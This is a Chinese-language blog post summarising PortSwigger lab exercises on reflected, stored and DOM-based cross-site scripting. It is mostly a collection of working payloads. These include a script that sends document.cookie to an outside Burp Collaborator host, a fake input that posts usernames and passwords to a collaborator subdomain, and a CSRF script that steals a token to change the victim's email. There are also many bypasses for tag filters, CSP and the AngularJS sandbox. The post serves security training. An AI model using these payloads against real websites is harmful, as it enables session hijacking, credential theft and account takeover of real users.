PortSwigger 跨站点脚本(XSS)

已于 2022-12-06 18:01:08 修改
阅读量1.5k 收藏 1
点赞数 1
分类专栏: PortSwigger 靶场总结 文章标签: xss javascript html web安全 安全
于 2022-11-30 16:12:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42451330/article/details/128103376
版权

一、反射型 XSS

        1、什么是反射型 XSS?

        当应用程序在 HTTP 请求中接收数据并以不安全的方式将该数据包含在即时响应中时,就会出现反射式跨站点脚本。如:将XSS反射到HTML上下文中,没有进行转义

https://insecure-website.com/search?term=<script>alert(1)</script>

        2、利用XSS漏洞可以干嘛?

                (1)利用跨站点脚本窃取 cookie

<script>
fetch('https://sgcgvts1zzg794zz17vu2dbfd6jx7m.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

                (2)利用跨站点脚本捕获密码

<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

                (3)利用跨站点脚本执行 CSRF

//当请求完成时触发保存返回报文
req.onload = handleResponse;
//创造请求
req.open('get','/my-account',true);
//发送请求
req.send();
function handleResponse() {
//获取token,(\W+):匹配一个或多个非字母进行切割,匹配到的非字母全部缓存;
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=wiener@normal-user.net')
};
</script>

        3、如何利用-01 反射到上下文中的XSS

                (1)将XSS反射到HTML上下文中,未进行任何编码

<script>alert(1)</script>

                (2)将 XSS 反射到 HTML 上下文中,但大多数标签和事件都被阻止了

                        解题思路:通过Burp Suite 暴力破解先找到未被阻止的标签:body,继而确定未被阻止的事件;onresize,最后通过该标签和事件进行利用。如:

<iframe src="https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>

                (3)将 XSS 反射到 HTML 上下文中,阻止除自定义标签之外的所有标签

        tabindex属性:将首先移动到具有最小tabIndex属性值的控件上,最后在具有最大tabIndex属性值的控件上结束移动。如果有两个控件的tabIndex属性相同,则以控件在html代码中出现的顺序为准。默认的tabIndex属性为 0 ,将排列在在所有指定tabIndex的控件之后。而若把tabIndex属性设为一个负值(如tabIndex="-1"),那么这个链接将被排除在TAB键的序列之外

https://YOUR-LAB-ID.web-security-academy.net/?search=<xss+id=x+onfocus=alert(document.cookie) tabindex=1>#x

                (4)事件和属性都阻止的反射到href执行的反射式 XSS

        animate:元素可以用于实现动画效果

        attributeName:定义发生变化的元素属性名

<svg><a><animate+attributeName=href+values=javascript:alert(1)+/><text+x=20+y=20>Click me</text></a>

                (5)允许使用一些 SVG 标签的反射式 XSS

        animatetransform标签:进行动画处理

        onBegin() :当元素周期开始时由onbegin 事件立即触发

<svg><animatetransform%20onbegin=alert(1)>

        4、如何利用-02 反射到HTML 标记属性中的 XSS            

                (1)将 XSS 反射到带有尖括号 HTML 编码的属性中

        onmouseover事件:当鼠标移到该元素之上触发事件

"onmouseover="alert(1)

                (2)规范链接标记中的反射 XSS

        accesskey 属性:规定激活(使元素获得焦点)元素的快捷键

        当用户使用以下快捷键将触发漏洞

  •                        在视窗上:ALT+SHIFT+X
    •                 在 MacOS 上:CTRL+ALT+X
      •          在 Linux 上:Alt+X
url?'accesskey='x'onclick='alert(1)

        5、如何利用-03 反射到JavaScript 代码中的XSS

                (1)终止现有的JavaScript脚本进行反射注入

</script><script>alert(1)</script>

                (2) 打破现有的JavaScript字符串进行反射注入

'-alert(document.domain)-'
';alert(document.domain)//

                (3)单引号被转义时,通过JavaScript进行反射注入

\'-alert(1)//

                (4)某些字符被阻止,通过JavaScript进行反射注入

&'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:'

                (5) 应用程序阻止或转义单引号字符,通过利用HTML编码进行绕过

                &apos=‘

                onclick 事件会在元素被点击时发生

http://foo?&apos;-alert(1)-&apos;

                 (6)将javaScript 表达式嵌入到字符串模板文本中执行,进行反射注入

${alert(document.domain)}

        6、如何利用-04 通过客户端模板注入利用

                (1)反射式XSS与AngularJS沙盒无字符串绕过

                AngularJS 沙箱是一种机制,可防止访问 AngularJS 模板表达式中的潜在危险对象

&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1

                (2)使用 AngularJS 沙盒转义绕过 CSP

                内容安全策略(CSP):当 CSP 模式在 AngularJS 中处于活动状态时,它会以不同的方式解析模板表达式,并避免使用构造函数


https://YOUR-LAB-ID.web-security-academy.net/?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x

二、存储型XSS

        1、什么是存储型XSS

        当应用程序从不受信任的源接收数据并以不安全的方式将该数据包含在其以后的 HTTP 响应中时,就会出现存储的 XSS(也称为持久或二阶 XSS。

        2、如何利用存储型XSS

                (1)将XSS存储到HTML上下文中,没有任何编码 

<script>alert(1)</script>

                 (2)将 XSS 存储到带有双引号 HTML 编码的锚点属性href中

javascript:alert(document.domain)

                (3)将 XSS 存储到带有双引号 HTML 编码中,并通过HTML编码进行绕过 

http://foo?&apos;-alert(1)-&apos;

三、DOM型XSS

        1、什么是DOM型XSS

        DOM型XSS漏洞是一种特殊类型的XSS,是基于文档对象模型 Document Object Model (DOM)的一种漏洞。

        2、如何利用DOM型XSS

                (1)当接收器存在适用的元素  (document.write  location.search)

“> <svg onload=alert(1)>

                (2)当接收器中使用选择元素时,通过闭合该元素进行绕过(document.write  location.search)

</select><img src=1 onerror=alert(1)>

                (3)接收器不接受任何新式浏览器上的元素,也不会触发事件时,存在innerHTML时可向对象插入内容。

             innerHTML:在JS是双向功能:获取对象的内容 或 向对象插入内容

<img src=1 onerror=alert(1)>

                 (4)使用哈希更改事件在 jQuery 选择器接收器中的 DOM XSS

<iframe src="https://0a36003c0488ebe5c2948a0200b70043.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>

                 (5)AngularJS表达式中的DOM XSS,在双大括号内执行 JavaScript 表达式。

{{$on.constructor('alert(1)')()}}

                 (6)反射式 DOM XSS

\"-alert(1)}//

                (7)存储的 DOM XSS

<><img src=1 onerror=alert(1)>

战斗爽!战斗爽!战斗爽!战斗爽!战斗爽!
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Portswigger-web-security-academy】xss lab
No Title
12-29 552
Lab: Reflected XSS into HTML context with all tags blocked except custom ones 题目提示是拦截了所有html标签,只能使用自定义标签。先尝试在搜索框中写入自定义标签: <custom id=test> 查看网页源代码: <header class="notification-header"> </header> <section class=blog-header> &l
PortswiggerXSS:收集XSS备忘单有效载荷并创建可用的单词表
04-25
PortswiggerXSS 收集备忘单有效载荷并创建可用的单词表 谢谢您所做的一切令人惊奇的工作和努力 :red_heart: 只需按原样构建或运行脚本,不需要args。 其余的应该为您处理。 免责声明:不是最干净的代码,但它可以工作:) 备忘单: : 感谢ArenasDev添加以下参数和功能:-tag用于标签过滤-event用于事件过滤-filename用于设置过滤列表的名称-update强制更新(如果存在有效负载文件,则不会更新) 执照 我只是一个简单的滑行。 许可对我来说不是什么大问题,我在网上发布对我有帮助的内容,希望其他人可以: A)从代码中学习B)与代码一起使用或C)只需要嘲笑某件事即可使自己感觉更好 无论哪种方式,如果这对您有帮助-太酷了:)
PortSwigger30连环靶场XSS脚本攻击—基础篇
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
05-28 345
PortSwigger XSS靶场—基础篇 攻略向...
【无标题】【portswigger】第二专题-XSS(一)
人间体佐菲的博客
07-26 495
视频同步更新至bilibilibilibili地址欢迎关注微信公众号:微光安全团队这一篇文章是一个关于xss的简单总结首先你需要有一点点的js知识最起码知道什么东西都是干什么的其次,你要对xss进行一个简单的分类常规来说有反射型,存储型,dom型,但我觉得这些都没啥用,知道不知道没什么不同所以我就简单的按照一些xss注入点来说。
Postswigger 靶场 XSS 通关
最新发布
来日可期的博客
12-12 1234
找到了注入点位置,在a标签的href中,那么我们就可以构造攻击代码了,这里采用伪协议的方式,在Website中来构造攻击代码。观察发现,参数returnPath的值会回显到href属性中,底下的script中的代码也验证了。发现我们的攻击代码被传递到了img标签中,这里我们可以尝试将该标签闭合。页面将我们输入的攻击代码传递到了input标签的value参数中。查看页面源代码发现尖括号,反斜杠,单引号,双引号已经被编码了。发现我们的攻击代码被传入到了一个span标签中,构造攻击代码。
portswigger证书
11-19
portswigger证书,der格式、pem格式,转化好的,直接可以用哦! Android设备抓包必备哦!
buby:PortSwigger Burp Suite 的 BurpExtender 接口的 JRuby 实现
06-08
说明: Buby 是 JRuby 与 PortSwigger 流行的商业 Web 安全测试工具 Burp Suite 的混搭。 Burp 由使用 BurpExtender API 的 Java 扩展或使用新的嵌入式 JRuby 支持的 JRuby BurpExtender 实现驱动并绑定到 JRuby。 ...
burpsuitezhengshu
02-04
burpsuite safty credenticate service,...................................................................................................
基于深度学习的sql注入检测系统`内训练模型和推理脚本和环境搭建教程.zip
11-01
基于深度学习的sql注入检测系统`内训练模型和推理脚本和环境搭建教程 #### 有用的设置信息 (1) 每个应用程序都作为 WAR 文件分发在`/SUT/*.war`中; (2) 应用程序的数据库位于WAR 文件中。您可以在加载 SUT 后使用...
XSSor:XSSor是Burp Suite的半自动反射式和持久性XSS检测器扩展。 该工具是由应用程序安全专家Barak Tawily用Python编写的。 XSSor旨在通过执行半自动反射和持久性XSS检测测试来帮助安全测试人员
05-09
XSSor是Burp Suite的半自动反射式和持久性XSS检测器扩展。 该工具是由应用程序安全专家Barak Tawily用Python编写的。 XSSor旨在通过执行半自动反射和持久XSS检测测试来帮助安全测试人员。 安装 Download Burp Suite...
说说脚本
09-15
说说脚本
portswigger】第二专题-XSS(二)
人间体佐菲的博客
07-26 841
视频同步更新至bilibilibibi地址欢迎关注微信公众号:微光安全团队。
PortSwigger 基于 DOM 的漏洞
weixin_42451330的博客
03-06 437
本文介绍PortSwigger靶场 DOM漏洞,包括DOM漏洞介绍、利用方式、防御措施等。如有疑问欢迎私聊。
PortSwigger(八)脚本XSS漏洞
weixin_52835927的博客
11-06 212
/script>单击“存储”和“向受害者提供漏洞”。此注入创建一个带有 ID 的自定义标签,其中包含触发函数的事件处理程序。URL 末尾的哈希值在页面加载后立即聚焦于此元素,从而导致调用有效负载。
burpsuite靶场系列之客户端漏洞篇 - 脚本(XSS)专题
weixin_50464560的博客
04-14 3089
https://www.anquanke.com/post/id/245953 本系列介绍 PortSwigger是信息安全从业者必备工具burpsuite的发行商,作为网络空间安全的领导者,他们为信息安全初学者提供了一个在线的网络安全学院(也称练兵场),在讲解相关漏洞的同时还配套了相关的在线靶场供初学者练习,本系列旨在以初学者视角出发对学习该学院内容及靶场练习进行全程记录并为其他初学者提供学习参考,希望能对初学者们有所帮助。 客户端漏洞篇介绍 相对于服务器端漏洞篇,客户端漏洞篇会更加复杂
渗透技巧基于Swagger-UI的XSS
网安君的博客
08-25 8192
swagger-ui是一个允许 API 交互和可视化的库,Swagger-UI有一个特性它允许您向 API 规范提供URL一个yaml或json文件,它将被获取并显示给用户。该漏洞产生的原因是swagger-ui使用了一个过时的库DomPurify(DOMPurify是一个开源的基于DOM的快速XSS净化工具。输入HTML元素,然后通过DOM解析递归元素节点,进行净化,输出安全HTML。),结合库的特性允许获得由查询参数控制的DOM型XSS
站点脚本编制描述及解决方法
热门推荐
xrdlqy的专栏
02-04 2万+
原文地址:http://www.ibm.com/developerworks/cn/security/s-csscript/#2   简介: 站点脚本编制可能是一个危险的安全性问题,在设计安全的基于 Web 的应用程序时应该考虑这一点。本文中,Paul 描述了这种问题的本质、它是如何起作用的,并概述了一些推荐的修正策略。 当今的大多数网站都对 Web 页面添加了动态内容,从而使用户能获
JS安全漏洞-1.1
caishu1995的博客
01-09 821
1、基于DOM的站点脚本编制     XSS(cross site script,脚本攻击),指的是攻击者向合理的web中插入恶意脚本代码,然后提交给服务器,随机服务器相应页面即被植入攻击者的恶意脚本代码。      应对方法:1、不信任用户输入的内容 2、对输入的内容进行转义 3、防止攻击者通过利用document.的属性植入恶意脚本   2、通过URL重定向钓鱼   3、客户...
JS中常见的安全漏洞
qq_34309704的博客
04-09 1万+
  1、基于DOM的站点脚本编制(XSS) ①XSS(Cross Site Script):站点脚本编制,指的是攻击者向合法的web页面插入恶意的脚本代码(通常是是HTML代码和JS代码),然后提交给服务器,随即服务器响应页面(被植入的恶意脚本代码),攻击者可以利用这些恶意脚本代码进行会话挟持登攻击。例如:攻击者在论坛中放一个看似安全得连接,骗取用户点击之后,盗取cookies得用户隐私信...
portswigger Authentication
07-28
PortSwigger是一家网络安全公司,他们开发了一款名为Burp Suite的强大的网络安全测试工具。在Burp Suite中,有一个功能模块是用于进行身份验证测试的,即Authentication模块。这个模块可以帮助安全专业人员测试应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值